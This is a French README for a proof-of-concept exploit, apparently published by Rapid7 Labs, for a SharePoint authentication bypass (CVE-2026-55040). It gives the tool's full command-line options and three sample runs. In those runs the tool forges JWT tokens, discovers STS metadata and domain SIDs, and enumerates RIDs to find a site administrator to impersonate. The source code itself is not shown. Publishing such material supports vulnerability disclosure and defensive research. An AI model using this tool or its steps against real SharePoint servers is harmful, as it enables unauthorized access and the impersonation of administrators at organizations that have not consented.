
Exploit de preuve de concept pour Microsoft SharePoint CVE-2026-55040 qui forge des jetons JWT, contourne l'authentification, découvre automatiquement les métadonnées et usurpe l'identité des administrateurs de site via l'énumération SID.
CVE-2026-55040.py est un script de preuve de concept pour exploiter la vulnérabilité de contournement de l'authentification SharePoint, CVE-2026-55040.
Pour une analyse technique complète, consultez notre Analyse Rapid7.
$ python CVE-2026-55040.py --help
usage: CVE-2026-55040.py [-h] [--target TARGET] [--host HOST] [--x5t X5T] [--realm REALM] [--sid SID] [--upn UPN]
[--auto-upn] [--username USERNAME] [--rid RID] [--max-rid MAX_RID] [--port PORT]
[--domain-ip DOMAIN_IP] [--http]
Rapid7 Labs - Microsoft SharePoint Authentication Bypass (CVE-2026-55040)
options:
-h, --help show this help message and exit
--target TARGET Target IP address (auto-discovers all params)
--host HOST SharePoint hostname (auto-discovered)
--x5t X5T STS signing cert x5t (auto-discovered from metadata)
--realm REALM SharePoint realm GUID (auto-discovered from metadata)
--sid SID Windows SID for identity (auto-discovered via LSARPC)
--upn UPN UPN for identity, e.g. [email protected] (alternative to --sid, no SMB needed)
--auto-upn Auto-construct UPN from HTTPS cert domain (no SMB needed; derives host from cert)
--username USERNAME Username for --auto-upn (default: administrator)
--rid RID Specific RID to use (skips iteration). If not set, auto-SID iterates 500 then 1000+ to find a
site admin
--max-rid MAX_RID Max RID to try during auto-SID iteration (default: 10000)
--port PORT Non-standard port for target web service (default: 443 for HTTPS, 80 for HTTP)
--domain-ip DOMAIN_IP
Domain controller IP for SMB/LSARPC discovery (default: same as --target). Use when the DC is
a different system than the SharePoint server
--http Use HTTP instead of HTTPS (disables auto-discovery; must supply --host, --x5t, --realm, --sid
manually)
En fournissant uniquement un nom d'hôte cible via --host, le JWT forgé utilisera une identité de nommage AccessToken pour l'utilisateur NT AUTHORITY\LOCAL SERVICE.
Remarque : Bien que le contournement de l'authentification aboutisse, les ressources auxquelles vous pouvez accéder via l'identité AccessToken sont limitées. Par exemple, vous ne pouvez pas accéder à certains points de terminaison comme /_api/contextinfo (illustré ci-dessous lors de l'opération « Obtention du digest de formulaire »), mais vous pouvez accéder à d'autres ressources protégées, par exemple /_vti_bin/sites.asmx. Selon la prochaine vulnérabilité à laquelle le contournement de l'authentification est enchaîné, l'utilisation d'une identité de nommage AccessToken peut être viable.
$ python3 CVE-2026-55040.py --host WIN-FG3H2SKPOTA.fritz.box
======================================================================
Rapid7 Labs - Microsoft SharePoint Authentication Bypass (CVE-2026-55040)
======================================================================
[1] Auto-discovery...
[+] Discovering x5t and realm from STS metadata...
[*] x5t: 84eAgzfNOtqgEPs8usO4Jr_0Zf8
[*] realm: 0e2603c3-5eef-4d0f-90ca-53ee9a7729a4
[+] No --domain-ip/--sid/--upn provided; using local service identity
[+] Targeting: https://WIN-FG3H2SKPOTA.fritz.box
[2] Forging JWT token...
[+] Token forged (1025 bytes)
[3] Obtaining form digest...
[-] Failed to get digest. Response: {"odata.error":{"code":"-2147024891, System.UnauthorizedAccessException","message":{"lang":"en-US","value":"Access denied. You do not have permission to perform this action or access this resource."}}}
En fournissant un nom d'hôte cible via --host et l'--domain-ip d'un contrôleur de domaine correspondant, le JWT forgé utilisera une identité de nommage urn:office:idp:activedirectory pour un utilisateur identifié par un identifiant de sécurité Windows (SID). Le SID de cet utilisateur est automatiquement découvert pour trouver un administrateur de site.
Si vous connaissez un SID à l'avance, vous pouvez omettre l'--domain-ip et passer le SID connu via --sid.
$ python3 -m pipx install impacket
$ python3 CVE-2026-55040.py --host WIN-FG3H2SKPOTA.fritz.box --domain-ip 192.168.86.11
======================================================================
Rapid7 Labs - Microsoft SharePoint Authentication Bypass (CVE-2026-55040)
======================================================================
[1] Auto-discovery...
[+] Discovering x5t and realm from STS metadata...
[*] x5t: 84eAgzfNOtqgEPs8usO4Jr_0Zf8
[*] realm: 0e2603c3-5eef-4d0f-90ca-53ee9a7729a4
[+] Discovering domain SID via SMB (192.168.86.11)...
[*] domain_sid: S-1-5-21-4203888158-2793536450-3921675298 (will iterate RIDs)
[*] DC differs from target; will discover SharePoint hostname separately
[+] Targeting: https://WIN-FG3H2SKPOTA.fritz.box
[+] Iterating RIDs to find site admin (500, then 1000-10000)...
[-] RID 500: no valid user
[-] RID 1000: no valid user
[-] RID 1050: no valid user
[-] RID 1100: no valid user
[-] RID 1150: no valid user
[-] RID 1200: no valid user
[-] RID 1250: no valid user
[-] RID 1300: no valid user
[-] RID 1350: no valid user
[-] RID 1400: no valid user
[-] RID 1450: no valid user
[-] RID 1500: no valid user
[-] RID 1550: no valid user
[-] RID 1600: no valid user
[+] RID 1602: i:0#.w|testdomain2\testuser1 (testuser1)
[+] RID 1605: SHAREPOINT\system (System Account) ** SITE ADMIN **
[+] Found site admin at RID 1605, stopping scan
[+] Using site admin SID: S-1-5-21-4203888158-2793536450-3921675298-1605
[+] Login: SHAREPOINT\system
[2] Forging JWT token...
[+] Token forged (1040 bytes)
[3] Obtaining form digest...
[+] Digest obtained.
En fournissant un nom d'hôte cible via --host et l'--upn d'un utilisateur de site connu, le JWT forgé utilisera une identité de nommage urn:office:idp:activedirectory pour le nom d'utilisateur principal (UPN) donné.
$ python3 CVE-2026-55040.py --host WIN-79B765S1R4G --upn [email protected]
======================================================================
Rapid7 Labs - Microsoft SharePoint Authentication Bypass (CVE-2026-55040)
======================================================================
[1] Auto-discovery...
[+] Discovering x5t and realm from STS metadata...
[*] x5t: a1g8DVePm6FB892C0AAB23-Wl7M
[*] realm: 66aaa1e2-b658-41c4-8911-ff2d5bab5423
[+] Targeting: https://WIN-79B765S1R4G
[2] Forging JWT token...
[+] Token forged (1047 bytes)
[3] Obtaining form digest...
[+] Digest obtained.